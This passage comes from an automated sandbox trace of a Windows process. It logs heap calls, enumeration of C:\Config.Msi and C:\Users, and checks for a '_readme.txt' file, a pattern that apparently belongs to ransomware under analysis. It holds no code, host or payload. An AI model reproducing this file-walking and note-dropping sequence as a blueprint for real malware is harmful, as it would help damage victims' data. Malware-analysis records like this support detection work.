(HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.991] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee60 | out: hHeap=0x680000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.991] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0092.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0092.992] PathFindFileNameW (pszPath="") returned="" [0092.992] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0092.992] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0092.992] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0092.992] FreeLibrary (hLibModule=0x75670000) returned 1 [0092.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0092.992] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.992] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0092.992] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.993] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0092.993] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.993] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.993] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa321bbe0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.993] PathFindExtensionW (pszPath="C:\\Config.Msi\\_readme.txt") returned=".txt" [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175ea0 | out: hHeap=0x680000) returned 1 [0092.993] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa321bbe0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa321bbe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa321bbe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0092.993] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.993] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0092.993] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0092.993] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0092.994] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.994] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.994] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.994] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.995] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.995] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.995] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.995] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.995] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.995] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.995] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.995] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.996] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.996] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.996] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0092.996] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.996] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.996] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.996] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0092.996] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0092.996] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0092.996] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0092.996] PathFindFileNameW (pszPath="") returned="" [0092.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.996] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0092.997] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0092.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0092.997] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0092.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0092.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0092.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efcc0 | out: hHeap=0x680000) returned 1 [0092.997] FreeLibrary (hLibModule=0x75670000) returned 1 [0092.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0092.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0092.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.997] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175fc0 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175ea0 | out: hHeap=0x680000) returned 1 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175b40 | out: hHeap=0x680000) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f08 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.998] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.998] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0092.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0092.999] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0092.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x498) returned 0x31d01f0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efcc0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee60 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef770 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 